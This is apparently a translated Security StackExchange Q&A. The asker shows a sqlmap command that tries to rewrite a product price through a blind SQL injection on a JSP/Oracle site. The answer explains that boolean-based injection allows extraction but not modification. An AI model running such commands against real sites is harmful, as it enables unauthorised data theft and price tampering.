我试着用下面的代码来投票
sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price"
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'" 我之前检查过这个链接,它在info参数(基于布尔的盲)中是可注入的。执行上述代码的结果是:
warning: "execution of custom SQL queries is only available when stacked queries are supported"有什么办法可以解决这个问题吗?
这个网站运行在Apache、JSP和Oracle上。
发布于 2017-03-26 02:17:35
这里没有解决办法。通常可以使用基于布尔值的sql注入漏洞转储整个数据库,但不能执行更新。
您可以提取但不能插入或修改现有数据。
https://security.stackexchange.com/questions/154917
复制相似问题